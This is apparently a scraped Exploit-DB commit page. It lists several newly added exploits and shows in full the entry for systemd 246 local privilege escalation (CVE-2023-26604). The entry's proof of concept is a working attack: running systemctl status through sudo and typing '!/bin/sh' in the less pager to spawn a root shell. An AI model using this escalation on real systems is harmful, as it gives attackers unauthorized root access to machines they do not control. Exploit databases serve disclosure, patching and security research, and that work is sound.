f55092b332
6 changes to exploits/shellcodes/ghdb TP-Link Archer AX21 - Unauthenticated Command Injection systemd 246 - Local Privilege Escalation Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE) Request-Baskets v1.2.1 - Server-side request forgery (SSRF) OutSystems Service Studio 11.53.30 - DLL Hijacking
17 lines
No EOL
660 B
Text
17 lines
No EOL
660 B
Text
# Exploit Title: systemd 246 - Local Privilege Escalation
|
|
# Exploit Author: Iyaad Luqman K (init_6)
|
|
# Application: systemd 246
|
|
# Tested on: Ubuntu 22.04
|
|
# CVE: CVE-2023-26604
|
|
|
|
systemd 246 was discovered to contain Privilege Escalation vulnerability, when the `systemctl status` command can be run as root user.
|
|
This vulnerability allows a local attacker to gain root privileges.
|
|
|
|
## Proof Of Concept:
|
|
1. Run the systemctl command which can be run as root user.
|
|
|
|
sudo /usr/bin/systemctl status any_service
|
|
|
|
2. The ouput is opened in a pager (less) which allows us to execute arbitrary commands.
|
|
|
|
3. Type in `!/bin/sh` in the pager to spawn a shell as root user. |